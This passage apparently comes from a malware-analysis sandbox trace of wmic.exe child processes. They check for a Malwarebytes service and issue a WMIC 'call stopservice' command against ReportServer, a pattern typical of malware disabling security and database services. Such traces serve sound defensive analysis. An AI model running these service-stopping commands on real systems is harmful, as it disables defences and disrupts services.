SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0306.986] SysStringLen (param_1=" WHERE name like '%%MBAMService%%'") returned 0x22 [0306.986] free (_Block=0x3229808) [0306.986] free (_Block=0x322bd20) [0306.986] free (_Block=0x322bf48) [0306.986] free (_Block=0x322ae40) [0306.986] malloc (_Size=0xc) returned 0x322be28 [0306.986] IWbemServices:ExecQuery (in: This=0x2f70780, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MBAMService%%'", lFlags=48, pCtx=0x0, ppEnum=0x2ecfa2c | out: ppEnum=0x2ecfa2c*=0x2f751d0) returned 0x0 [0306.997] free (_Block=0x322be28) [0306.997] CoSetProxyBlanket (pProxy=0x2f751d0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0307.002] IEnumWbemClassObject:Next (in: This=0x2f751d0, lTimeout=-1, uCount=0x1, apObjects=0x2ecfa28, puReturned=0x2ecfa18 | out: apObjects=0x2ecfa28*=0x0, puReturned=0x2ecfa18*=0x0) returned 0x1 [0307.910] IUnknown:Release (This=0x2f751d0) returned 0x0 [0307.912] free (_Block=0x322bd50) [0307.912] free (_Block=0x322ae70) [0307.912] free (_Block=0x322aeb8) [0307.912] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0307.912] free (_Block=0x322aea0) [0307.912] free (_Block=0x322baf8) [0307.912] free (_Block=0x322bab8) [0307.912] free (_Block=0x322ba78) [0307.912] free (_Block=0x322ba48) [0307.912] free (_Block=0x322ba18) [0307.912] free (_Block=0x322bb68) [0307.912] free (_Block=0x322bb28) [0307.912] free (_Block=0x322b9d8) [0307.912] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0307.913] GetCurrentThreadId () returned 0x3e0 [0307.913] ??0CHString@@QAE@PBG@Z () returned 0x2ecfbe0 [0307.913] ??YCHString@@QAEABV0@PBG@Z () returned 0x2ecfbe0 [0307.913] malloc (_Size=0x800) returned 0x322c0e0 [0307.913] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x322c0e0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0307.913] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0307.913] malloc (_Size=0x1c) returned 0x322b9d8 [0307.913] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x322b9d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0307.913] __iob_func () returned 0x776f2608 [0307.913] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0307.913] __iob_func () returned 0x776f2608 [0307.913] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0307.914] free (_Block=0x322b9d8) [0307.914] free (_Block=0x322c0e0) [0307.914] ??1CHString@@QAE@XZ () returned 0x1 [0307.914] WbemLocator:IUnknown:Release (This=0x2f70780) returned 0x0 [0307.915] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0307.915] _kbhit () returned 0x0 [0307.919] free (_Block=0x3222ee8) [0307.919] free (_Block=0x322ad80) [0307.919] free (_Block=0x322ab10) [0307.919] free (_Block=0x322ad68) [0307.919] free (_Block=0x322ad50) [0307.919] free (_Block=0x322b058) [0307.919] free (_Block=0x322b198) [0307.919] free (_Block=0x3229da8) [0307.919] free (_Block=0x322b228) [0307.919] free (_Block=0x322adc8) [0307.919] free (_Block=0x3222ba0) [0307.919] free (_Block=0x3220520) [0307.920] free (_Block=0x322bca8) [0307.920] free (_Block=0x322ab70) [0307.920] free (_Block=0x322ae58) [0307.920] free (_Block=0x322bc68) [0307.920] free (_Block=0x322bc28) [0307.920] free (_Block=0x322aed0) [0307.920] free (_Block=0x322ae10) [0307.920] free (_Block=0x322ae88) [0307.920] free (_Block=0x322bbf8) [0307.920] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0307.920] free (_Block=0x322b0f8) [0307.920] free (_Block=0x322ab58) [0307.920] free (_Block=0x3220568) [0307.920] free (_Block=0x322adf8) [0307.920] free (_Block=0x322b1e0) [0307.920] free (_Block=0x322ab88) [0307.920] free (_Block=0x3222b60) [0307.920] free (_Block=0x32226b0) [0307.920] free (_Block=0x32226f8) [0307.920] free (_Block=0x3222740) [0307.920] free (_Block=0x322ae28) [0307.920] free (_Block=0x32227c8) [0307.920] free (_Block=0x3220508) [0307.920] free (_Block=0x3222ac0) [0307.920] free (_Block=0x32204f0) [0307.920] free (_Block=0x3222c20) [0307.921] free (_Block=0x32204d8) [0307.921] free (_Block=0x3222d40) [0307.921] free (_Block=0x3222908) [0307.921] free (_Block=0x3222920) [0307.921] free (_Block=0x32228d0) [0307.921] free (_Block=0x32228e8) [0307.921] free (_Block=0x3222940) [0307.921] free (_Block=0x3222958) [0307.921] free (_Block=0x32204a0) [0307.921] free (_Block=0x32204b8) [0307.921] free (_Block=0x3222860) [0307.921] free (_Block=0x3222878) [0307.921] free (_Block=0x3222828) [0307.921] free (_Block=0x3222840) [0307.921] free (_Block=0x3222898) [0307.921] free (_Block=0x32228b0) [0307.921] free (_Block=0x32227f0) [0307.921] free (_Block=0x3222808) [0307.921] free (_Block=0x32227a0) [0307.921] free (_Block=0x3221200) [0307.921] free (_Block=0x322afd0) [0307.922] WbemLocator:IUnknown:Release (This=0x2f14ba8) returned 0x2 [0307.922] WbemLocator:IUnknown:Release (This=0x2f1a8d8) returned 0x0 [0307.922] WbemLocator:IUnknown:Release (This=0x2f14ba8) returned 0x1 [0307.922] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0307.922] WbemLocator:IUnknown:Release (This=0x2f14ba8) returned 0x0 [0307.922] free (_Block=0x322acf0) [0307.922] free (_Block=0x322ad20) [0307.922] free (_Block=0x3222c80) [0307.922] free (_Block=0x322ac48) [0307.922] free (_Block=0x322ab28) [0307.922] free (_Block=0x3222aa0) [0307.922] free (_Block=0x322ac60) [0307.922] free (_Block=0x322ac18) [0307.923] free (_Block=0x32229c0) [0307.923] free (_Block=0x322ac30) [0307.923] free (_Block=0x322aca8) [0307.923] free (_Block=0x3222c40) [0307.923] free (_Block=0x322ac78) [0307.923] free (_Block=0x322ad08) [0307.923] free (_Block=0x3222a00) [0307.923] free (_Block=0x322ab40) [0307.923] free (_Block=0x322ac00) [0307.923] free (_Block=0x3222ca0) [0307.923] free (_Block=0x322abd0) [0307.923] free (_Block=0x322ad98) [0307.923] free (_Block=0x32229e0) [0307.923] free (_Block=0x322acd8) [0307.923] free (_Block=0x322abe8) [0307.923] free (_Block=0x3222a60) [0307.923] free (_Block=0x3229958) [0307.923] free (_Block=0x322ac90) [0307.923] free (_Block=0x3222cc0) [0307.923] free (_Block=0x322adb0) [0307.923] free (_Block=0x322abb8) [0307.923] free (_Block=0x3222d00) [0307.923] free (_Block=0x322acc0) [0307.924] free (_Block=0x322ade0) [0307.924] free (_Block=0x3222d60) [0307.924] free (_Block=0x322ad38) [0307.924] free (_Block=0x322aba0) [0307.924] free (_Block=0x32229a0) [0307.924] free (_Block=0x32298c8) [0307.924] free (_Block=0x3229820) [0307.924] free (_Block=0x3222ae0) [0307.924] free (_Block=0x32297f0) [0307.924] free (_Block=0x3229880) [0307.924] free (_Block=0x3222ce0) [0307.924] free (_Block=0x3229868) [0307.924] free (_Block=0x3229940) [0307.924] free (_Block=0x3222b40) [0307.924] free (_Block=0x3229988) [0307.924] free (_Block=0x32299a0) [0307.924] free (_Block=0x3222a20) [0307.924] free (_Block=0x3229910) [0307.924] free (_Block=0x3229850) [0307.924] free (_Block=0x3222a80) [0307.924] free (_Block=0x3229970) [0307.924] free (_Block=0x32298e0) [0307.924] free (_Block=0x3222b80) [0307.925] free (_Block=0x3229898) [0307.925] free (_Block=0x32298b0) [0307.925] free (_Block=0x3222d20) [0307.925] free (_Block=0x32298f8) [0307.925] free (_Block=0x32299b8) [0307.925] free (_Block=0x3222c60) [0307.925] free (_Block=0x3229838) [0307.925] free (_Block=0x3229928) [0307.925] free (_Block=0x3222a40) [0307.925] CoUninitialize () [0307.950] exit (_Code=0) [0307.950] free (_Block=0x322aee8) [0307.950] free (_Block=0x3221008) [0307.950] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0307.950] free (_Block=0x3222e10) [0307.950] free (_Block=0x32227e0) [0307.950] free (_Block=0x3220fe8) [0307.950] free (_Block=0x3220fc8) [0307.950] free (_Block=0x3220f98) [0307.950] free (_Block=0x3220f78) [0307.950] free (_Block=0x3220f48) [0307.950] free (_Block=0x3220f08) [0307.950] free (_Block=0x3220ee8) [0307.950] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0307.950] free (_Block=0x3222b00) Thread: id = 310 os_tid = 0xf44 Thread: id = 311 os_tid = 0xf40 Thread: id = 312 os_tid = 0x384 Thread: id = 313 os_tid = 0xf98 Process: id = "30" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x5b34c000" os_pid = "0x1120" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 314 os_tid = 0x12d4 [0308.120] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0308.121] __set_app_type (_Type=0x1) [0308.121] __p__fmode () returned 0x776f3c14 [0308.121] __p__commode () returned 0x776f49ec [0308.121] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0308.121] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0308.121] ??0CHString@@QAE@XZ () returned 0xa685ec [0308.122] malloc (_Size=0x18) returned 0x3510ef0 [0308.122] malloc (_Size=0x38) returned 0x3510f10 [0308.122] malloc (_Size=0x28) returned 0x3510f50 [0308.122] malloc (_Size=0x18) returned 0x3510f80 [0308.122] malloc (_Size=0x24) returned 0x3510fa0 [0308.122] malloc (_Size=0x18) returned 0x3510fd0 [0308.122] malloc (_Size=0x18) returned 0x3510ff0 [0308.122] ??0CHString@@QAE@XZ () returned 0xa688fc [0308.122] malloc (_Size=0x18) returned 0x3511010 [0308.122] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0308.122] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0308.122] _onexit (_Func=0xa5f370) returned 0xa5f370 [0308.123] _onexit (_Func=0xa5f380) returned 0xa5f380 [0308.123] _onexit (_Func=0xa5f390) returned 0xa5f390 [0308.123] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0308.123] ResolveDelayLoadedAPI () returned 0x74a22590 [0308.124] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0308.129] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0308.142] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x31948d8) returned 0x0 [0308.172] GetCurrentProcess () returned 0xffffffff [0308.172] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x30afd18 | out: TokenHandle=0x30afd18*=0x194) returned 1 [0308.172] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x30afd14 | out: TokenInformation=0x0, ReturnLength=0x30afd14) returned 0 [0308.172] malloc (_Size=0x118) returned 0x35126b0 [0308.172] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x35126b0, TokenInformationLength=0x118, ReturnLength=0x30afd14 | out: TokenInformation=0x35126b0, ReturnLength=0x30afd14) returned 1 [0308.172] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x35126b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0308.172] free (_Block=0x35126b0) [0308.172] CloseHandle (hObject=0x194) returned 1 [0308.172] malloc (_Size=0x40) returned 0x35126b0 [0308.172] malloc (_Size=0x40) returned 0x35126f8 [0308.172] malloc (_Size=0x40) returned 0x3512740 [0308.172] SetThreadUILanguage (LangId=0x0) returned 0x2fe0409 [0308.176] _vsnwprintf (in: _Buffer=0x3512740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x30afca0 | out: _Buffer="ms_409") returned 6 [0308.176] malloc (_Size=0x20) returned 0x3512788 [0308.176] GetComputerNameW (in: lpBuffer=0x3512788, nSize=0x30afd04 | out: lpBuffer="NQDPDE", nSize=0x30afd04) returned 1 [0308.176] lstrlenW (lpString="NQDPDE") returned 6 [0308.176] malloc (_Size=0xe) returned 0x3511208 [0308.177] lstrlenW (lpString="NQDPDE") returned 6 [0308.177] ResolveDelayLoadedAPI () returned 0x7444db00 [0308.177] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x30afd18 | out: lpNameBuffer=0x0, nSize=0x30afd18) returned 0x2fe5000 [0308.179] GetLastError () returned 0xea [0308.179] malloc (_Size=0x1e) returned 0x35127b0 [0308.179] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x35127b0, nSize=0x30afd18 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x30afd18) returned 0x1 [0308.180] lstrlenW (lpString="") returned 0 [0308.180] lstrlenW (lpString="NQDPDE") returned 6 [0308.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0308.182] lstrlenW (lpString=".") returned 1 [0308.182] lstrlenW (lpString="NQDPDE") returned 6 [0308.182] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0308.182] lstrlenW (lpString="LOCALHOST") returned 9 [0308.182] lstrlenW (lpString="NQDPDE") returned 6 [0308.182] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0308.182] lstrlenW (lpString="NQDPDE") returned 6 [0308.182] lstrlenW (lpString="NQDPDE") returned 6 [0308.182] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0308.182] free (_Block=0x3511208) [0308.182] lstrlenW (lpString="NQDPDE") returned 6 [0308.182] malloc (_Size=0xe) returned 0x3511208 [0308.182] lstrlenW (lpString="NQDPDE") returned 6 [0308.182] lstrlenW (lpString="NQDPDE") returned 6 [0308.183] malloc (_Size=0xe) returned 0x35127d8 [0308.183] lstrlenW (lpString="NQDPDE") returned 6 [0308.183] malloc (_Size=0x4) returned 0x35127f0 [0308.183] malloc (_Size=0xc) returned 0x3512800 [0308.183] ResolveDelayLoadedAPI () returned 0x7745b870 [0308.194] malloc (_Size=0x18) returned 0x3512818 [0308.194] malloc (_Size=0xc) returned 0x3512838 [0308.194] SysStringLen (param_1="IDENTIFY") returned 0x8 [0308.194] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0308.194] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0308.194] SysStringLen (param_1="IDENTIFY") returned 0x8 [0308.194] malloc (_Size=0x18) returned 0x3512850 [0308.194] malloc (_Size=0xc) returned 0x3512870 [0308.194] SysStringLen (param_1="IMPERSONATE") returned 0xb [0308.194] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0308.194] SysStringLen (param_1="IMPERSONATE") returned 0xb [0308.195] SysStringLen (param_1="IDENTIFY") returned 0x8 [0308.195] SysStringLen (param_1="IDENTIFY") returned 0x8 [0308.195] SysStringLen (param_1="IMPERSONATE") returned 0xb [0308.195] malloc (_Size=0x18) returned 0x3512888 [0308.195] malloc (_Size=0xc) returned 0x35128a8 [0308.195] SysStringLen (param_1="DELEGATE") returned 0x8 [0308.195] SysStringLen (param_1="IDENTIFY") returned 0x8 [0308.195] SysStringLen (param_1="DELEGATE") returned 0x8 [0308.195] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0308.195] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0308.195] SysStringLen (param_1="DELEGATE") returned 0x8 [0308.195] malloc (_Size=0x18) returned 0x35128c0 [0308.195] malloc (_Size=0xc) returned 0x35128e0 [0308.195] malloc (_Size=0x18) returned 0x35128f8 [0308.195] malloc (_Size=0xc) returned 0x3512918 [0308.195] SysStringLen (param_1="NONE") returned 0x4 [0308.195] SysStringLen (param_1="DEFAULT") returned 0x7 [0308.195] SysStringLen (param_1="DEFAULT") returned 0x7 [0308.195] SysStringLen (param_1="NONE") returned 0x4 [0308.195] malloc (_Size=0x18) returned 0x3512930 [0308.195] malloc (_Size=0xc) returned 0x3512950 [0308.195] SysStringLen (param_1="CONNECT") returned 0x7 [0308.195] SysStringLen (param_1="DEFAULT") returned 0x7 [0308.195] malloc (_Size=0x18) returned 0x3512968 [0308.196] malloc (_Size=0xc) returned 0x3512988 [0308.196] SysStringLen (param_1="CALL") returned 0x4 [0308.196] SysStringLen (param_1="DEFAULT") returned 0x7 [0308.196] SysStringLen (param_1="CALL") returned 0x4 [0308.196] SysStringLen (param_1="CONNECT") returned 0x7 [0308.196] malloc (_Size=0x18) returned 0x35129a0 [0308.196] malloc (_Size=0xc) returned 0x35104a0 [0308.196] SysStringLen (param_1="PKT") returned 0x3 [0308.196] SysStringLen (param_1="DEFAULT") returned 0x7 [0308.196] SysStringLen (param_1="PKT") returned 0x3 [0308.196] SysStringLen (param_1="NONE") returned 0x4 [0308.196] SysStringLen (param_1="NONE") returned 0x4 [0308.197] SysStringLen (param_1="PKT") returned 0x3 [0308.197] malloc (_Size=0x18) returned 0x35104b8 [0308.197] malloc (_Size=0xc) returned 0x35104d8 [0308.197] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0308.197] SysStringLen (param_1="DEFAULT") returned 0x7 [0308.197] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0308.197] SysStringLen (param_1="NONE") returned 0x4 [0308.197] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0308.197] SysStringLen (param_1="PKT") returned 0x3 [0308.197] SysStringLen (param_1="PKT") returned 0x3 [0308.197] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0308.197] malloc (_Size=0x18) returned 0x3512b28 [0308.197] malloc (_Size=0xc) returned 0x35104f0 [0308.197] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0308.197] SysStringLen (param_1="DEFAULT") returned 0x7 [0308.197] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0308.197] SysStringLen (param_1="PKT") returned 0x3 [0308.197] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0308.197] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0308.197] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0308.197] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0308.197] malloc (_Size=0x18) returned 0x3512a48 [0308.197] malloc (_Size=0x40) returned 0x3510508 [0308.197] malloc (_Size=0x20a) returned 0x35197c8 [0308.197] GetSystemDirectoryW (in: lpBuffer=0x35197c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0308.197] free (_Block=0x35197c8) [0308.197] malloc (_Size=0xc) returned 0x3510550 [0308.197] malloc (_Size=0xc) returned 0x3510568 [0308.197] malloc (_Size=0xc) returned 0x35199b8 [0308.197] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0308.198] SysStringLen (param_1="\\wbem\\") returned 0x6 [0308.198] free (_Block=0x3510550) [0308.198] free (_Block=0x3510568) [0308.198] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0308.198] free (_Block=0x35199b8) [0308.198] malloc (_Size=0xc) returned 0x35198c8 [0308.198] malloc (_Size=0xc) returned 0x35197f0 [0308.198] malloc (_Size=0xc) returned 0x3519868 [0308.198] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0308.198] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0308.198] free (_Block=0x35198c8) [0308.198] free (_Block=0x35197f0) [0308.198] GetCurrentThreadId () returned 0x12d4 [0308.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x30af828 | out: phkResult=0x30af828*=0x1a0) returned 0x0 [0308.198] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x30af834, lpcbData=0x30af830*=0x400 | out: lpType=0x0, lpData=0x30af834*=0x30, lpcbData=0x30af830*=0x4) returned 0x0 [0308.199] _wcsicmp (_String1="0", _String2="1") returned -1 [0308.199] _wcsicmp (_String1="0", _String2="2") returned -2 [0308.199] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x30af830*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x30af830*=0x42) returned 0x0 [0308.199] malloc (_Size=0x86) returned 0x3512dc8 [0308.199] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3512dc8, lpcbData=0x30af830*=0x42 | out: lpType=0x0, lpData=0x3512dc8*=0x25, lpcbData=0x30af830*=0x42) returned 0x0 [0308.199] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0308.199] malloc (_Size=0x42) returned 0x3510550 [0308.199] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0308.199] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x30af834, lpcbData=0x30af830*=0x400 | out: lpType=0x0, lpData=0x30af834*=0x36, lpcbData=0x30af830*=0xc) returned 0x0 [0308.199] _wtol (_String="65536") returned 65536 [0308.199] free (_Block=0x3512dc8) [0308.199] RegCloseKey (hKey=0x0) returned 0x6 [0308.199] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x30afcc4 | out: ppv=0x30afcc4*=0x35045a8) returned 0x0 [0308.215] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x35045a8, xmlSource=0x30afc48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x30afcb0 | out: isSuccessful=0x30afcb0*=0xffff) returned 0x0 [0308.317] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x35045a8, DOMElement=0x30afcc0 | out: DOMElement=0x30afcc0*=0x3506b48) returned 0x0 [0308.318] malloc (_Size=0xc) returned 0x35199b8 [0308.318] IXMLDOMElement:getElementsByTagName (in: This=0x3506b48, tagName="XSLFORMAT", resultList=0x30afcbc | out: resultList=0x30afcbc*=0x3509ca0) returned 0x0 [0308.319] free (_Block=0x35199b8) [0308.319] IXMLDOMNodeList:get_length (in: This=0x3509ca0, listLength=0x30afcb8 | out: listLength=0x30afcb8*=21) returned 0x0 [0308.319] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=0, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.319] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="texttable.xsl") returned 0x0 [0308.319] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.320] malloc (_Size=0xc) returned 0x3519898 [0308.320] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.320] free (_Block=0x3519898) [0308.320] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0308.320] malloc (_Size=0xc) returned 0x3519880 [0308.320] malloc (_Size=0xc) returned 0x3519958 [0308.320] malloc (_Size=0x18) returned 0x3512ce8 [0308.320] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.320] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.320] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.320] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=1, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.321] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="textvaluelist.xsl") returned 0x0 [0308.321] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.321] malloc (_Size=0xc) returned 0x35199a0 [0308.321] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.321] free (_Block=0x35199a0) [0308.321] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, 